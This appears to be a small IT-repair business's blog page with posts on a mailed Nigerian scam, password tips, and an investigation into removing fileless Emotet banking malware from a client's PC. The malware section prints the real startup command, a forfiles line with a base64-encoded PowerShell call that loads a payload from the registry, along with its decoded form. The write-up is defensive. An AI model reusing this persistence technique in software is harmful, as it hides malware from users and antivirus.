Nigerian Scam

Scams come in many varieties. Often though, we are used to receiving Nigerian Scams via email. I had a client this week drop in a letter she received in the mail. This is a reminder that scammers will change their tactics, and use old tactics to try and keep ahead of the curve.

More information regards Nigerians scams can be found on the Scam Watch website.

Password Tips

Many people have poor password habits. They use the same password everywhere, and often use obvious tricks to please the conditions required on various websites.

These obvious tricks are making the first letter uppercase, adding a number to the end of the password, or substituting a O with a 0, or an S with a $.

Here are some tips on what you should and should not do regarding passwords.

Your passwords should:

Contain as many characters as possible – longer is better, although some websites do have a limit: woah!thispasswordisreallylong is better than short1

Includes uppercase and lowercase – mix it up a bit, not just the first letter: ITSnotTOOhardTOMIXTHECASES!! is better than Generic1

Include a number and/or symbol – Again, mix it up a bit. Don’t put the number or symbol at the beginning or the end: ADDSOMEsymbols$$HERE&THERE is better than Symbol$

Include multiple words – Multiple words is easier to remember than a sting of random symbols, numbers, and letters: PASSphrasesarewhatyou#WANT244 is better than Password1

Your passwords should not:

Include any personal details – YourName1, 25StreetName, 026343####

Contain the name of a family member, friend, or pet – Father1950, Lucy90, Socks1,

Contain the name of your town, farm – Grenfell2810, PropertyName2810

Make obvious substitutions. i.e. 0 instead of o, 1 instead of l, $ instead of s. Gr3nf311 is stronger than Grenfell, but cyber criminals know that we often replace letters with numbers that look the same.

Contain only a single word: Single dictionary words are the worst password you could choose. A cyber criminal attempting to log into accounts is going to access the accounts with the most simple passwords first. If you password can be found in a dictionary, your account will get compromised first.

I hope these hints help you to create better and more secure passwords!


For more password tips check out our other blog posts on Password Security and Creating Strong Passphrases using Diceware.

Analyzing File-less Banking Malware

This malware appears to have originated from an email claiming to be ASIC Messaging Service. It advises the user that their business name is due for renewal . The link within the email does not take the user to the ASIC website, but instead links to a website for a community newspaper.  This website appears to have at some stage been compromised. A page had been added that automatically forwards the user to another malicious website. This is where malware was downloaded onto the clients PC.

For those who are interested in the more technical details, I wont link directly to the pages, but the Virus Total page for the original link can be found here.  The link in which it redirects to is no longer available but the Virus Total page can be viewed here.  The second link has been marked by a member of the Virus Total community as ASIC phising/malware.

I was investigating the Malware infection for a client after the fact. At the time the client clicked the link (browser history verified link was clicked) a java script file appears to have been downloaded onto the machine. Virus TotalHybrid Analysis links.

It is easy to blame the victim in these cases, but some phishing emails have become so well put together that anyone could fall for it.

The client had noticed after this time a command prompt window would flashed up on the screen upon Windows start up.

There was also a line at the bottom that I missed in the screenshot that read:

ERROR: Access is denied for “C:\WINDOWS\System32\winevt\”

At this time the clients bank contacted them to advice that their PC was infected with a Banking Trojan.

Removing File-less Banking Malware

I had no luck removing the malware with KVRT and had to proceed with a manual approach. ESET, my go to AV, did not detect the malware, nor did Windows Defender.

KVRT showed the infection as:

MEM:Trojan-Banker.multi.Emotet.gen.

Upon inspecting the startup, a command that utilizes a trusted Windows executable file, was set to run each bootup.

The command was:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c “cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAXABJAGQAZQBuAHQAaQB0AGkAZQBzAFwAewA0ADYANABBAEUARABGADUALQAwADUAQwA3AC0AQgA2ADYAMQAtADEANwAxADIALQBBADkANQA5ADcAOAAyADkAQgBFADQARAB9ACcAKQAuAFQA”

When the text is decoded the command is:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c “cmd /c @file -ec iex (gp ‘HKCU:\\Identities\{464AEDF5-05C7-B661-1712-A9597829BE4D}’).T”

Base64 text can be decoded using Certutil found in C:\WINDOWS\System32\

i.e. certutil.exe -decode encoded.txt decoded.txt

Base64 can also be decoded using an online service such as https://www.base64decode.org/.

Forfiles has been set to run each start up and load the malware from the registry into the memory. This avoids it writing to disk and helps to prevent detection.

While I didn’t analyse exactly what EMOTET was doing, banking malware is designed to steal login credentials. The password is captured when you log into your bank and is sent back to a server that the attacker controls. Often with banking malware screenshots are taken to allow the attacker to capture other information such as funds available and account numbers.

Protecting yourself

Antivirus is not the magical safe guard it is often made out to be. It is still a great idea to have some kind of antivirus running on your device, but there are other task you can do to protect yourself or your business.

Train against phishing – It is simple for most home users; don’t click links, and avoid attachments from people you don’t know. But for business users, it is a littler harder. Many staff members jobs involve clicking links and opening attachment. This is why user training is important. Take a Phishing IQ Test.

Remove administrator privileges – I have covered this previously. Taking away administrator privileges can often limit what foothold malware can gain on your device.

Keep your software up to date – Some malware will exploit known vulnerabilities in your operating system or software. Windows users can install updates for the Operating System via Windows Updates (Windows Key + R, type control update, press enter, and click Check for updates). Software can be easily updated using Patch my PC.

Ask for help – If you receive an email that does not seem right, call a trusted friend or ask a colleague (If your business has in house IT staff start here). Sometimes talking out loud will help you tell if something is genuine or not.

Read our other articles and share will your friends – I have covered many other tech tips topics. Read them and share them with your friends.

Computer Maintenance & Repairs, Custom Built Computers, Laptops and more.